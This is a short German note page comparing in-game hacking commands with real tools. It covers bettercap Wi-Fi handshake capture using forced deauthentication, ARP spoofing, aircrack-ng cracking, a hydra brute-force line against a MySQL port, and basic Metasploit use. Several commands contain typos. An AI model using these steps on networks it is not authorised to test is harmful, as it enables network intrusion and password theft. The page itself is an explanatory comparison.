|
In-Game:
net.probe on
net.show
wifi.recon [Interface]
wifi.show
set.wifi.ap [BSSD]
wifi.deauth
Der Vorgang produziert ein Datei mit der Endung .pcap aus der dann im nächsten Schritt mit hashcat das Wifi-Passwort ausgelesen wird.
Realität
Zunächst muss man ein wlan-Device haben, das in der Lage ist im Promiscuous mode Pakete abzufangen. Die Dann muss entweder mit bettercap oder wireshar Pakete abfangen und diese dann mit aircrack-ng, nach einer Konvertierung mit editcap versuchen zu cracken.
wifi
Wlan-Verbindung muss ausgeschaltet sein.
# sudo airmon-ng start wlan0
# sudo airmon-ng check kill
# sudo bettercap - -iface wlan0
wlan0: set wifi.recon channel [ch]
wlan0: wifi.recon on
wlan0: set net.sniff.outpout handshake.pcap
wlan0: net.sniff on
wifi.deauth // Reconnects erzwingen
net.sniff off
exit
arp
Wlan-Verbindung muss bestehen.
set arp.spoof.targes [IP]
set arp.spoof.fullduplex.true
arp.spoof on
Diese Befehlsfolge produziert dann im Erfolgsfalle eine .pcap- File dass man versuchen muss auszulesen:
aircrack-ng handshake.pcap
In-Game:
hashcat [file.pcap]
nslookup
In-Game:
nslookup [domain.name]
Real:
Funtkioniert
In-Game:
"decrypt it: Txkg..."
openssl -dec TXkgYmFuayBwYXNzd29yZDogMTJ0YWdiZzBiVFpSR1di
Real:
Die Zeichenfolge ist nur mit base-64 kodiert und nicht mit einem Password o.ä. verschlüsselt und kann daher einfach mit base-64 dekodiert werden.
echo "TXkgYmFuayBwYXNzd29yZDogMTJ0YWdiZzBiVFpSR1di" | openssl base64 -d
In-game:
nmap [ip-adress][Optionen z.B. -Sv]
In-game:
hydra -T 242.166.4.221:3306 -P ./downloads/wordlist.lst
In-game:
lynx [Suchbegriff]
Real:
osint-toos wie sherlock, oder social engeneering oder ähnliches.
python3 netTree [IP-Adresse]
msfconsole
Kommandos in der Konsole:
search
Innerhalb eines Modules dann:
show options
set rhost [IP Adresse]
set rport [port]
Werbung:
|